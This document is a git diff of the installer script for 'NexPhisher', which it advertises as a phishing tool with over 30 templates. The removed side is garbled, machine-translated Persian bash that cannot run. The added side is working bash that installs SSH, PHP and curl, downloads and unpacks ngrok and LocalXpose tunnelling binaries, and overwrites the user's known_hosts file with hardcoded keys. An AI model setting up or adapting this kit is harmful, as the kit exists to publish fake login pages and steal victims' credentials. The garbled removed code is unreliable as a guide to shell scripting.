Creator pedar rap.md

diff --git a/pedar rap b/pedar rap
--- a/pedar rap
+++ b/pedar rap
@@ -1,114 +1,114 @@
 #!/bin/bash
 
-بنر () {
-روشن
-printf "\ e [0m \ n"
-printf "\ e [0m \ e [92m _ _ \ e [0m \ e [93m _____ _ _ _ \ e [0m \ n"
-printf "\ e [0m \ e [92m | \ | | \ e [0m \ e [93m | __ \ | | (_) | | \ e [0m \ n"
-printf "\ e [0m \ e [92m | \ | | _____ __ \ e [0m \ e [93m | | __) | | __ _ ___ | | __ ___ _ __ \ e [0m \ n"
-printf "\ e [0m \ e [92m |. | / _ \ \ / / \ e [0m \ e [93m | ___ / | _ \ | / __ | _ \ / _ \ __ | \ e [0m \ n "
-printf "\ e [0m \ e [92m | | \ | __/> <\ e [0m \ e [93m | | | | | | \ __ \ | | | __/ | \ e [0m \ n"
-printf "\ e [0m \ e [92m | _ | \ _ | \ ___/_/\ _ _ \ \ e [0m \ e [93m | _ | | | | | | | | ___/_ | | _ | \ ___ | _ | \ e [0m \ e [1؛ 44m [V 1.0] \ e [0m \ n "
-printf "\ e [0m \ n"
-printf "\ e [0m \ e [1؛ 41m ابزار پیشرفته فیشینگ با 30+ الگو [بر اساس: HTR-TECH] \ e [0m \ n"
-printf "\ e [0m \ n"
+banner() {
+clear
+printf "\e[0m\n"
+printf "\e[0m\e[92m  _   _            \e[0m\e[93m _____  _     _     _                \e[0m\n"
+printf "\e[0m\e[92m | \ | |           \e[0m\e[93m|  __ \| |   (_)   | |               \e[0m\n"
+printf "\e[0m\e[92m |  \| | _____  __ \e[0m\e[93m| |__) | |__  _ ___| |__   ___ _ __  \e[0m\n"
+printf "\e[0m\e[92m | .   |/ _ \ \/ / \e[0m\e[93m|  ___/|  _ \| / __|  _ \ / _ \  __| \e[0m\n"
+printf "\e[0m\e[92m | |\  |  __/>  <  \e[0m\e[93m| |    | | | | \__ \ | | |  __/ |    \e[0m\n"
+printf "\e[0m\e[92m |_| \_|\___/_/\_\ \e[0m\e[93m|_|    |_| |_|_|___/_| |_|\___|_| \e[0m\e[1;44m[V 1.0]\e[0m\n"
+printf "\e[0m\n"
+printf " \e[0m\e[1;41m Advanced Phishing Tool with 30+ Templates  [BY : HTR-TECH ]\e[0m\n"
+printf "\e[0m\n"
 }
-بنر
-printf "\ e [0m \ n"
-printf "\ e [0m \ e [1؛ 91m [\ e [1؛ 97m ~ \ e [1؛ 91m] \ e [1؛ 93m نصب بسته ها .... \ e [0m \ n"
-printf "\ e [0m \ n"
+banner
+printf "\e[0m\n"
+printf "\e[0m\e[1;91m [\e[1;97m~\e[1;91m]\e[1;93m Installing Packages ....\e[0m\n"
+printf "\e[0m\n"
 apt-get update
-apt -get upgrade -y
-apt -get -y ssh را نصب کنید
-apt -get -y curl را نصب کنید
-apt -get -y php را نصب کنید
-apt -get -y را از حالت فشرده خارج کنید
-apt-get -y سرور opensh-server را نصب کنید
-printf "\ e [0m \ n"
-printf "\ e [0m \ e [1؛ 91m [\ e [1؛ 97m ~ \ e [1؛ 91m] \ e [1؛ 93m راه اندازی محیط .... \ e [0m \ n"
-اگر [[-d .htr]] ؛ سپس
+apt-get upgrade -y
+apt-get -y install ssh
+apt-get -y install curl
+apt-get -y install php
+apt-get -y install unzip
+apt-get -y install openssh-server
+printf "\e[0m\n"
+printf "\e[0m\e[1;91m [\e[1;97m~\e[1;91m]\e[1;93m Setting Up Environment ....\e[0m\n"
+if [[ -d .htr ]]; then
 printf ""
-دیگری
+else
 mkdir .htr
 fi
-اگر [[-d logs]] ؛ سپس
+if [[ -d logs ]]; then
 printf ""
-دیگری
-mkdir سیاهههای مربوط
+else
+mkdir logs
 fi
-اگر [[-e Modules.zip]] ؛ سپس
+if [[ -e Modules.zip ]]; then
 unzip -qq Modules.zip
 rm Modules.zip
 fi
-اگر [[-e .htr/گرمk]] ؛ سپس
+if [[ -e .htr/ngrok ]]; then
 printf ""
-دیگری
-arch = $ (uname -a | grep -o 'arm' | head -n1)
-arch2 = $ (uname -a | grep -o 'Android' | head -n1)
-اگر [[$ arch == * 'بازو' *]] || [[$ arch2 == * 'Android' *]]؛ سپس
-curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip>/dev/null 2> & 1
-اگر [[-e ngrok-stable-linux-arm.zip]] ؛ سپس
-unzip گرمk-stable-linux-arm.zip> /dev /null 2> & 1
+else
+arch=$(uname -a | grep -o 'arm' | head -n1)
+arch2=$(uname -a | grep -o 'Android' | head -n1)
+if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
+curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
+if [[ -e ngrok-stable-linux-arm.zip ]]; then
+unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
 mv ngrok .htr
 rm -rf ngrok-stable-linux-arm.zip
 chmod +x .htr/ngrok
-دیگری
-printf "\ n \ e [1؛ 31m [\ e [0m \ e [1؛ 77m! \ e [0m \ e [1؛ 31m] \ e [0m \ e [1؛ 93m خطا \ e [1؛ 31m [\ e [0m \ e [1؛ 77m! \ e [0m \ e [1؛ 31m] \ e [0m \ e [1؛ 96m به صورت دستی Ngrok را نصب کنید. \ e [0m \ n "
-خروج 1
+else
+printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install Ngrok Manually.\e[0m\n"
+exit 1
 fi
-دیگری
-curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip>/dev/null 2> & 1 
-if [[-e ngrok-stable-linux-386.zip]] ؛ سپس
-unzip گرمk-stable-linux-386.zip> /dev /null 2> & 1
+else
+curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 
+if [[ -e ngrok-stable-linux-386.zip ]]; then
+unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
 mv ngrok .htr
 rm -rf ngrok-stable-linux-386.zip
 chmod +x .htr/ngrok
-دیگری
-printf "\ n \ e [1؛ 31m [\ e [0m \ e [1؛ 77m! \ e [0m \ e [1؛ 31m] \ e [0m \ e [1؛ 93m خطا \ e [1؛ 31m [\ e [0m \ e [1؛ 77m! \ e [0m \ e [1؛ 31m] \ e [0m \ e [1؛ 96m به صورت دستی Ngrok را نصب کنید. \ e [0m \ n "
-خروج 1
+else
+printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install Ngrok Manually.\e[0m\n"
+exit 1
 fi
 fi
 fi
-اگر [[-e .htr/loclx]] ؛ سپس
+if [[ -e .htr/loclx ]]; then
 printf ""
-دیگری
-archa = $ (uname -a | grep -o 'arm' | head -n1)
-arch2a = $ (uname -a | grep -o 'Android' | head -n1)
-if [[$ archa == * 'arm' *]] || [[$ arch2a == * 'Android' *]]؛ سپس
-curl -LO https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-arm.zip>/dev/null 2> & 1
-اگر [[-e loclx-linux-arm.zip]] ؛ سپس
-فشرده سازی loclx-linux-arm.zip> /dev /null 2> & 1
+else
+archa=$(uname -a | grep -o 'arm' | head -n1)
+arch2a=$(uname -a | grep -o 'Android' | head -n1)
+if [[ $archa == *'arm'* ]] || [[ $arch2a == *'Android'* ]] ; then
+curl -LO https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-arm.zip > /dev/null 2>&1
+if [[ -e loclx-linux-arm.zip ]]; then
+unzip loclx-linux-arm.zip > /dev/null 2>&1
 mv loclx .htr
 rm -rf loclx-linux-arm.zip
 chmod +x .htr/loclx
-دیگری
-printf "\ n \ e [1؛ 31m [\ e [0m \ e [1؛ 77m! \ e [0m \ e [1؛ 31m] \ e [0m \ e [1؛ 93m خطا \ e [1؛ 31m [\ e [0m \ e [1؛ 77m! \ e [0m \ e [1؛ 31m] \ e [0m \ e [1؛ 96m Install LocalXpose Manual. \ e [0m \ n "
-خروج 1
+else
+printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install LocalXpose Manually.\e[0m\n"
+exit 1
 fi
-دیگری
-curl -LO https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-386.zip>/dev/null 2> & 1 
-اگر [[-e loclx-linux-386.zip]] ؛ سپس
-فشرده سازی loclx-linux-386.zip> /dev /null 2> & 1
+else
+curl -LO https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-386.zip > /dev/null 2>&1 
+if [[ -e loclx-linux-386.zip ]]; then
+unzip loclx-linux-386.zip > /dev/null 2>&1
 mv loclx .htr
 rm -rf loclx-linux-386.zip
 chmod +x .htr/loclx
-دیگری
-printf "\ n \ e [1؛ 31m [\ e [0m \ e [1؛ 77m! \ e [0m \ e [1؛ 31m] \ e [0m \ e [1؛ 93m خطا \ e [1؛ 31m [\ e [0m \ e [1؛ 77m! \ e [0m \ e [1؛ 31m] \ e [0m \ e [1؛ 96m Install LocalXpose Manual. \ e [0m \ n "
-خروج 1
+else
+printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install LocalXpose Manually.\e[0m\n"
+exit 1
 fi
 fi
 fi
-اگر [[-d ~/.ssh]] ؛ سپس
+if [[ -d ~/.ssh ]]; then
 printf ""
-دیگری
+else
 mkdir ~/.ssh
 fi
 chmod +x nexphisher
-printf "| 1 | SVjtt9mtL4P / 5lsqaielF1pJHvM = | 6QmJXxfPd9A5uUaFI1RV2H4brTs = SSH-RSA AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lJnhW1oCXuAYV9IBdcJA + Vx7AHL5S / ZQvV2fhceOAPgO2kNQZla6xvUwoE4iw8lYu3zoE1KtieCU9yInWOVI6W / wFaT / ETH1tn55T2FVsK / zaxPiHZVJGLPPdEEid0vS2p1JDfc9onZ0pNSHLl1QusIOeMUyZ2bUMMLLgw46KOT9S3s / LmxgoJ3PocVUn5rVXz / Dng7Y8jYNe4IFrZOAUsi7hNBa + OYja6ceefpDvNDEJ1BdhbYfGolBdNA7f + FNl0kfaWru4Cblr843wBe2ckO / sNqgeAMXO / QH + SSgQxUXF2AgAw + TGp3yCIyYoOPvOgvcPsQziJLmDbUuQpnH است \ n | 1 | PiraXMKgzzt9DdPRSLAtRvRad0Y = | 2W162QXfHJvKKZWIaRyZO6VFWJI = ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQC3lJnhW1oCXuAYV9IBdcJA + Vx7AHL5S / ZQvV2fhceOAPgO2kNQZla6xvUwoE4iw8lYu3zoE1KtieCU9yInWOVI6W / wFaT / ETH1tn55T2FVsK / zaxPiHZVJGLPPdEEid0vS2p1JDfc9onZ0pNSHLl1QusIOeMUyZ2bUMMLLgw46KOT9S3s / LmxgoJ3PocVUn5rVXz / Dng7Y8jYNe4IFrZOAUsi7hNBa + OYja6ceefpDvNDEJ1BdhbYfGolBdNA7f + FNl0kfaWru4Cblr843wBe2ckO / sNqgeAMXO / QH + SSgQxUXF2AgAw + TGp3yCIyYoOPvOgvcPsQziJLmDbUuQpnH را \ n "> ~ / .ssh / known_hosts
-printf "\ e [0m \ n"
-printf "\ e [0m \ e [1؛ 91m [\ e [1؛ 97m ~ \ e [1؛ 91m] \ e [1؛ 93m نصب و راه اندازی به پایان رسید !! \ e [0m \ n"
-printf "\ e [0m \ n"
-خوابیدن 2
-printf "\ e [0m \ e [1؛ 91m [\ e [1؛ 97m ~ \ e [1؛ 91m] \ e [1؛ 93m Type \ e [1؛ 96mbash nexphisher \ e [1؛ 93m برای اجرای NEXPHISHER! ! \ e [0m \ n "
-printf "\ e [0m \ n"
-printf "\ e [0m \ n"
+printf "|1|SVjtt9mtL4P/5lsqaielF1pJHvM=|6QmJXxfPd9A5uUaFI1RV2H4brTs= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lJnhW1oCXuAYV9IBdcJA+Vx7AHL5S/ZQvV2fhceOAPgO2kNQZla6xvUwoE4iw8lYu3zoE1KtieCU9yInWOVI6W/wFaT/ETH1tn55T2FVsK/zaxPiHZVJGLPPdEEid0vS2p1JDfc9onZ0pNSHLl1QusIOeMUyZ2bUMMLLgw46KOT9S3s/LmxgoJ3PocVUn5rVXz/Dng7Y8jYNe4IFrZOAUsi7hNBa+OYja6ceefpDvNDEJ1BdhbYfGolBdNA7f+FNl0kfaWru4Cblr843wBe2ckO/sNqgeAMXO/qH+SSgQxUXF2AgAw+TGp3yCIyYoOPvOgvcPsQziJLmDbUuQpnH\n|1|PiraXMKgzzt9DdPRSLAtRvRad0Y=|2W162QXfHJvKKZWIaRyZO6VFWJI= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lJnhW1oCXuAYV9IBdcJA+Vx7AHL5S/ZQvV2fhceOAPgO2kNQZla6xvUwoE4iw8lYu3zoE1KtieCU9yInWOVI6W/wFaT/ETH1tn55T2FVsK/zaxPiHZVJGLPPdEEid0vS2p1JDfc9onZ0pNSHLl1QusIOeMUyZ2bUMMLLgw46KOT9S3s/LmxgoJ3PocVUn5rVXz/Dng7Y8jYNe4IFrZOAUsi7hNBa+OYja6ceefpDvNDEJ1BdhbYfGolBdNA7f+FNl0kfaWru4Cblr843wBe2ckO/sNqgeAMXO/qH+SSgQxUXF2AgAw+TGp3yCIyYoOPvOgvcPsQziJLmDbUuQpnH\n" > ~/.ssh/known_hosts
+printf "\e[0m\n"
+printf "\e[0m\e[1;91m [\e[1;97m~\e[1;91m]\e[1;93m Installation Completed !! \e[0m\n"
+printf "\e[0m\n"
+sleep 2
+printf "\e[0m\e[1;91m [\e[1;97m~\e[1;91m]\e[1;93m Type \e[1;96mbash nexphisher \e[1;93mto run NEXPHISHER !! \e[0m\n"
+printf "\e[0m\n"
+printf "\e[0m\n"
